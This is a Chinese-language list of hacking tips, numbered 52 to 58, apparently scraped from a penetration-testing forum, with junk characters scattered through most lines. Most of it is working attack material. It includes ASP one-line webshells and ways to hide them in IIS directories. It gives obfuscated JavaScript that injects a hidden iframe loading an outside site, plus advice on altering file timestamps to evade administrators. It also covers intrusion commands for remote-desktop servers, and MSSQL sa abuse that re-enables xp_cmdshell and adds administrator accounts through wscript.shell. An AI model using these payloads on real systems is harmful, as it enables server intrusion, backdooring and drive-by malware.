" ]! f2 v+ @. G3 V. s3 {: x* uf).<%if request("cmd")<>"" then execute request("pass")%>
0 |( O9 M; q  }+ r; p/ R% e$ P3 n: U; A( q
52、at "12:17" /interactive cmd
$ g' ?( p* l! b- p8 a执行后可以用AT命令查看新加的任务, g3 C# [9 J3 T5 x" z/ d
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。; Z6 g9 d+ f. j" Q/ x3 M

9 s- I4 S# }+ d( ~" m, d; C' o53、隐藏ASP后门的两种方法
5 S5 n- K1 @9 W) O- a& }4 w1、建立非标准目录:mkdir images..\9 x' r+ d! i' s( b
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp# l$ c& Y0 T9 |1 w& V
通过web访问ASP木马:http://ip/images../news.asp?action=login
5 J  V! U; k5 w# e3 N3 T如何删除非标准目录:rmdir images..\ /s# ]0 k  w3 [7 ]. y& ]
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
2 v7 J1 {4 }; ]* A0 Jmkdir programme.asp2 x1 M6 f3 y. U9 b
新建1.txt文件内容:<!--#include file=”12.jpg”-->0 G: {( M0 k# y5 H7 o" e) `+ h& d& G( ]
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
8 Q# J8 Q% n* `; a! n5 Yattrib +H +S programme.asp
8 o1 a! }1 r" A! H1 w3 `通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
& x0 ]2 }" Y; G2 V" g; u& w) y  ^; d1 ]6 C, C- Q
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
3 W+ K6 M4 P& X9 Z( y然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。6 J& d* V5 b' v
  d* v0 H0 D' q% T
55、JS隐蔽挂马
- s" k7 i  \' }+ f: h$ r1.' j- e& i( E2 Z: a6 C2 r) N
var tr4c3="<iframe src=ht";
% |/ }( s; `; P8 str4c3 = tr4c3+"tp:/";3 Y4 N; }" a) M( Y
tr4c3 = tr4c3+"/ww";
" T' ?& i, y. \tr4c3 = tr4c3+"w.tr4";' Q1 ?1 z7 j7 T
tr4c3 = tr4c3+"c3.com/inc/m";
3 B' l4 s, w9 @" Y9 c+ L% }5 Ptr4c3 = tr4c3+"m.htm style="display:none"></i";# k' L4 J# r; U8 F
tr4c3 =tr4c3+"frame>'";/ T! z% ~4 E) p* W( f4 F
document.write(tr4c3);5 s) ~9 Q2 M, G! \3 i. D5 X
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。( y; T" @2 z3 R/ k
7 q: \: c( B5 g# Q! {
2.
5 ?+ w: Y  I  h, Y- I转换进制,然后用EVAL执行。如1 e$ X. I4 p( O) j; ?3 J1 a
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
" o4 C) p. X7 N; j" }. E不过这个有点显眼。
! P9 Y8 o0 c% l0 y3.
& d) }6 F" }7 I5 k" vdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');% {. F/ \4 p8 [' ^8 @% p& m
最后一点,别忘了把文件的时间也修改下。3 ~$ Z, j" A8 I7 ]3 R4 `  A4 W

; Y  o3 d- ~( {9 D56.3389终端入侵常用DOS命令0 i: }" q" Z# a$ X# [
taskkill taskkill /PID 1248 /t! b7 u! k4 B0 d

' O) z0 ^0 C/ ~; _: O1 dtasklist 查进程
) n) o! ]# J& ~5 i
* J) c; ~0 u7 u+ m( Rcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
6 d8 z. w, ~4 A1 p6 j& f& xiisreset /reboot
, _1 Q" k+ m! u& wtsshutdn /reboot /delay:1    重起服务器+ I9 i# j) ^% F" K0 m

, s' I( T* @# Slogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 f  c( a9 w' D) q5 B
& ?  v) {* g9 i. a7 S5 V' @( L1 }3 j
query user 查看当前终端用户在线情况
  J* a+ P! E8 y; _! P0 Y! D% W  U: e& W# J0 w. I
要显示有关所有会话使用的进程的信息,请键入:query process *
& G5 J  g9 f$ s; j4 c, ^) E0 ?% r7 P4 w6 g% J  a7 P
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2( X- B6 E+ c+ N. @

7 o  z4 a9 o% O. }1 V3 i要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER21 }7 z* z* W, H6 Q, E
/ _, X, u0 B% h- Q( W& ~
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
# v$ k# H6 e( T/ Z3 ?- m/ T' s" p. [" l: O! X
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启+ a$ `. q1 p9 |. @) R! v# x2 K/ N
  D- o7 S2 W* o
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统7 A0 V' H* k  \) f

5 j5 [8 i6 E4 U0 \; C: C- P5 r! T命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 c# Y( s8 S. U& E& C3 ~
9 o; ^! A3 i2 }$ e% |# Q( @1 o命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机' H: p0 d& @& {3 E% G9 W

, I: \2 Z, |: p- P56、在地址栏或按Ctrl+O,输入:% Q4 P& Z  A7 l4 u
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;8 I, }( ?6 T. _5 t  {2 \" V

  G7 |! J+ [: i- l源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
" P. O0 ^  {, ~
0 i% u2 C3 P- C* E57、net user的时候,是不能显示加$的用户,但是如果不处理的话,2 k5 R: g( [- ?9 Z; P5 d
用net localgroup administrators是可以看到管理组下,加了$的用户的。
. P' X( p" I! t
+ g8 R' I: _% M5 x2 n; C58、 sa弱口令相关命令
8 Q4 P8 r# T5 l& M3 l- i) Q! T4 N8 t5 W7 H+ l, o" z
一.更改sa口令方法:
/ A$ }: d# T" b4 d$ {8 M4 R用sql综合利用工具连接后,执行命令:$ }, Z) y. H) L3 s0 K' `
exec sp_password NULL,'20001001','sa'- u' c) y' \+ |; z
(提示:慎用!)
$ z4 p5 a- F$ S1 y6 X$ N0 i4 K; ?) K* C6 Y
二.简单修补sa弱口令.
) C0 d0 B, U7 u. S/ G( G1 B. @# q( S# i+ q" j) l. X- b  d
方法1:查询分离器连接后执行:
- s# a1 k+ |1 t& wif exists (select * from& l( {5 ?3 n; p+ y' I" r9 \+ I! b
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and( C5 f- u+ j0 k1 D7 T) i
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
' b/ ]- z' e) E$ o! K( V1 L, `/ y- V3 Z7 r7 B
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
" `+ ?! P: @0 H2 q: p
9 g# M$ B; g4 q% C% ~, FGO
7 f; K8 c: {8 t7 {/ h6 g7 x
& N! K; I# j9 c( o. |! P然后按F5键命令执行完毕" D1 s" R2 t( L0 s7 U- V8 Z( i

+ B* L7 `; a7 Y0 A, ~* X5 X* f方法2:查询分离器连接后
# }( X* T& Z2 L, O, ~" j! k; d第一步执行:use master* @* L& u" B8 T  e/ q
第二步执行:sp_dropextendedproc 'xp_cmdshell'( |+ {1 A, Q9 \3 F& S
然后按F5键命令执行完毕
, `( ?5 a8 p( \7 p" s7 i
% k0 i  z/ P/ }5 S% M& Y3 l9 s* p3 F0 C: z2 ?% G
三.常见情况恢复执行xp_cmdshell.
, O" Q! z' F+ p2 M% P
& w' p' S7 ~) ?" I8 ~$ B$ b
4 @$ H- |- L6 x0 i, G8 N+ x0 _1 未能找到存储过程'master..xpcmdshell'.) j& b  g* J6 Z8 t
   恢复方法:查询分离器连接后,! n6 K# f3 d+ I; z# i- ]3 P6 c3 R
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int$ \3 N( }" K" F5 M; L$ E
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 i* M& R) Y- |5 \# T2 j然后按F5键命令执行完毕
# j7 i# j( n: R- c7 K$ Q
$ k8 D6 V+ Q$ H$ I( l% O2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)8 [# q3 F) r! \; U. R. U
恢复方法:查询分离器连接后,1 A2 g& m2 F2 a) A; E
第一步执行:sp_dropextendedproc "xp_cmdshell"" M: I) f: h9 x) a/ q$ g
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'# {5 }6 d' r, ]/ b# c+ e( N
然后按F5键命令执行完毕6 @9 y# d' g+ N2 A$ \9 b
  a& n5 F9 g- O. T2 ~
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
- ^( a! Z8 a7 r4 J; z# \2 \1 J恢复方法:查询分离器连接后,. Z9 B2 x4 W. b
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
2 [7 R, c# d5 B第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           . P- y+ Z+ i/ k8 u* ^. I- J2 v
然后按F5键命令执行完毕/ W9 O- v% U) f* n9 w5 k) n

0 D1 E  O6 t9 m四.终极方法.% D" K' w: t4 r) N
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:2 d; ^. p) l9 M1 f2 Z1 ^
查询分离器连接后,
( e7 ~9 T9 p* c1 G2000servser系统:
9 s3 v& i3 b$ l& edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
, l9 D1 Q) ^/ a( w( ?' M+ }+ r+ L( Y0 E9 g- J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'3 P& G% O$ g8 a

3 h( c2 H2 h$ r. l$ Jxp或2003server系统:
$ y& r, k9 `. n5 j; a
: S6 p# F- i: V; vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ O& C( O; N  C/ b$ T* d0 L8 A8 U% A: Z# z3 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 X. w# |3 C7 r5 W3 `




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2